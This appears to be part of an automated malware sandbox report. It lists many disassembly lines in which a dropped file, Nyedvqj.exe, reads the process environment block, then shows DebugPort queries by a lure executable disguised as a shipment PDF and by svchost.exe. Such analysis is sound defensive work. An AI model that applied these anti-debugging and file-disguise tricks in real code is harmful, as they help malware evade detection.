Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A14A2C mov eax, dword ptr fs:[00000030h]	17_2_00A14A2C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov ecx, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D5210 mov eax, dword ptr fs:[00000030h]	17_2_009D5210
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E8A0A mov eax, dword ptr fs:[00000030h]	17_2_009E8A0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8B260 mov eax, dword ptr fs:[00000030h]	17_2_00A8B260
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8B260 mov eax, dword ptr fs:[00000030h]	17_2_00A8B260
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8A62 mov eax, dword ptr fs:[00000030h]	17_2_00AA8A62
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1927A mov eax, dword ptr fs:[00000030h]	17_2_00A1927A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D9240 mov eax, dword ptr fs:[00000030h]	17_2_009D9240
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A64257 mov eax, dword ptr fs:[00000030h]	17_2_00A64257
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9EA55 mov eax, dword ptr fs:[00000030h]	17_2_00A9EA55
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]	17_2_00A04BAD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]	17_2_00A04BAD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04BAD mov eax, dword ptr fs:[00000030h]	17_2_00A04BAD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA5BA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA5BA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E1B8F mov eax, dword ptr fs:[00000030h]	17_2_009E1B8F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E1B8F mov eax, dword ptr fs:[00000030h]	17_2_009E1B8F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9138A mov eax, dword ptr fs:[00000030h]	17_2_00A9138A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8D380 mov ecx, dword ptr fs:[00000030h]	17_2_00A8D380
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0B390 mov eax, dword ptr fs:[00000030h]	17_2_00A0B390
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02397 mov eax, dword ptr fs:[00000030h]	17_2_00A02397
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A003E2 mov eax, dword ptr fs:[00000030h]	17_2_00A003E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A553CA mov eax, dword ptr fs:[00000030h]	17_2_00A553CA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A553CA mov eax, dword ptr fs:[00000030h]	17_2_00A553CA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FDBE9 mov eax, dword ptr fs:[00000030h]	17_2_009FDBE9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9131B mov eax, dword ptr fs:[00000030h]	17_2_00A9131B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DF358 mov eax, dword ptr fs:[00000030h]	17_2_009DF358
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A03B7A mov eax, dword ptr fs:[00000030h]	17_2_00A03B7A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A03B7A mov eax, dword ptr fs:[00000030h]	17_2_00A03B7A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DDB40 mov eax, dword ptr fs:[00000030h]	17_2_009DDB40
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8B58 mov eax, dword ptr fs:[00000030h]	17_2_00AA8B58
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DDB60 mov ecx, dword ptr fs:[00000030h]	17_2_009DDB60
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E849B mov eax, dword ptr fs:[00000030h]	17_2_009E849B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A914FB mov eax, dword ptr fs:[00000030h]	17_2_00A914FB
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]	17_2_00A56CF0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]	17_2_00A56CF0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56CF0 mov eax, dword ptr fs:[00000030h]	17_2_00A56CF0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8CD6 mov eax, dword ptr fs:[00000030h]	17_2_00AA8CD6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0BC2C mov eax, dword ptr fs:[00000030h]	17_2_00A0BC2C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]	17_2_00AA740D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]	17_2_00AA740D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA740D mov eax, dword ptr fs:[00000030h]	17_2_00AA740D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91C06 mov eax, dword ptr fs:[00000030h]	17_2_00A91C06
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56C0A mov eax, dword ptr fs:[00000030h]	17_2_00A56C0A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A44B mov eax, dword ptr fs:[00000030h]	17_2_00A0A44B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F746D mov eax, dword ptr fs:[00000030h]	17_2_009F746D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6C450 mov eax, dword ptr fs:[00000030h]	17_2_00A6C450
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6C450 mov eax, dword ptr fs:[00000030h]	17_2_00A6C450
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A035A1 mov eax, dword ptr fs:[00000030h]	17_2_00A035A1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA05AC mov eax, dword ptr fs:[00000030h]	17_2_00AA05AC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA05AC mov eax, dword ptr fs:[00000030h]	17_2_00AA05AC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]	17_2_00A01DB5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]	17_2_00A01DB5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A01DB5 mov eax, dword ptr fs:[00000030h]	17_2_00A01DB5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D2D8A mov eax, dword ptr fs:[00000030h]	17_2_009D2D8A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581 mov eax, dword ptr fs:[00000030h]	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0FD9B mov eax, dword ptr fs:[00000030h]	17_2_00A0FD9B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0FD9B mov eax, dword ptr fs:[00000030h]	17_2_00A0FD9B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9FDE2 mov eax, dword ptr fs:[00000030h]	17_2_00A9FDE2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A88DF1 mov eax, dword ptr fs:[00000030h]	17_2_00A88DF1
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov ecx, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A56DC9 mov eax, dword ptr fs:[00000030h]	17_2_00A56DC9
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009ED5E0 mov eax, dword ptr fs:[00000030h]	17_2_009ED5E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009ED5E0 mov eax, dword ptr fs:[00000030h]	17_2_009ED5E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9E539 mov eax, dword ptr fs:[00000030h]	17_2_00A9E539
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A5A537 mov eax, dword ptr fs:[00000030h]	17_2_00A5A537
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]	17_2_00A04D3B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]	17_2_00A04D3B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A04D3B mov eax, dword ptr fs:[00000030h]	17_2_00A04D3B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8D34 mov eax, dword ptr fs:[00000030h]	17_2_00AA8D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E3D34 mov eax, dword ptr fs:[00000030h]	17_2_009E3D34
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DAD30 mov eax, dword ptr fs:[00000030h]	17_2_009DAD30
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F7D50 mov eax, dword ptr fs:[00000030h]	17_2_009F7D50
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A13D43 mov eax, dword ptr fs:[00000030h]	17_2_00A13D43
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A53540 mov eax, dword ptr fs:[00000030h]	17_2_00A53540
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FC577 mov eax, dword ptr fs:[00000030h]	17_2_009FC577
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FC577 mov eax, dword ptr fs:[00000030h]	17_2_009FC577
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A546A7 mov eax, dword ptr fs:[00000030h]	17_2_00A546A7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA0EA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA0EA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA0EA5 mov eax, dword ptr fs:[00000030h]	17_2_00AA0EA5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6FE87 mov eax, dword ptr fs:[00000030h]	17_2_00A6FE87
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A016E0 mov ecx, dword ptr fs:[00000030h]	17_2_00A016E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A18EC7 mov eax, dword ptr fs:[00000030h]	17_2_00A18EC7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8FEC0 mov eax, dword ptr fs:[00000030h]	17_2_00A8FEC0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A036CC mov eax, dword ptr fs:[00000030h]	17_2_00A036CC
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8ED6 mov eax, dword ptr fs:[00000030h]	17_2_00AA8ED6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E76E2 mov eax, dword ptr fs:[00000030h]	17_2_009E76E2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A8FE3F mov eax, dword ptr fs:[00000030h]	17_2_00A8FE3F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]	17_2_009DC600
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]	17_2_009DC600
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DC600 mov eax, dword ptr fs:[00000030h]	17_2_009DC600
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A08E00 mov eax, dword ptr fs:[00000030h]	17_2_00A08E00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91608 mov eax, dword ptr fs:[00000030h]	17_2_00A91608
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A61C mov eax, dword ptr fs:[00000030h]	17_2_00A0A61C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A61C mov eax, dword ptr fs:[00000030h]	17_2_00A0A61C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DE620 mov eax, dword ptr fs:[00000030h]	17_2_009DE620
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E7E41 mov eax, dword ptr fs:[00000030h]	17_2_009E7E41
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FAE73 mov eax, dword ptr fs:[00000030h]	17_2_009FAE73
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9AE44 mov eax, dword ptr fs:[00000030h]	17_2_00A9AE44
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9AE44 mov eax, dword ptr fs:[00000030h]	17_2_00A9AE44
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E766D mov eax, dword ptr fs:[00000030h]	17_2_009E766D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E8794 mov eax, dword ptr fs:[00000030h]	17_2_009E8794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]	17_2_00A57794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]	17_2_00A57794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A57794 mov eax, dword ptr fs:[00000030h]	17_2_00A57794
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A137F5 mov eax, dword ptr fs:[00000030h]	17_2_00A137F5
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009FF716 mov eax, dword ptr fs:[00000030h]	17_2_009FF716
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0E730 mov eax, dword ptr fs:[00000030h]	17_2_00A0E730
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA070D mov eax, dword ptr fs:[00000030h]	17_2_00AA070D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA070D mov eax, dword ptr fs:[00000030h]	17_2_00AA070D
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A70E mov eax, dword ptr fs:[00000030h]	17_2_00A0A70E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0A70E mov eax, dword ptr fs:[00000030h]	17_2_00A0A70E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D4F2E mov eax, dword ptr fs:[00000030h]	17_2_009D4F2E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D4F2E mov eax, dword ptr fs:[00000030h]	17_2_009D4F2E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6FF10 mov eax, dword ptr fs:[00000030h]	17_2_00A6FF10
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A6FF10 mov eax, dword ptr fs:[00000030h]	17_2_00A6FF10
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA8F6A mov eax, dword ptr fs:[00000030h]	17_2_00AA8F6A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EEF40 mov eax, dword ptr fs:[00000030h]	17_2_009EEF40
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EFF60 mov eax, dword ptr fs:[00000030h]	17_2_009EFF60

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort	Jump to behavior
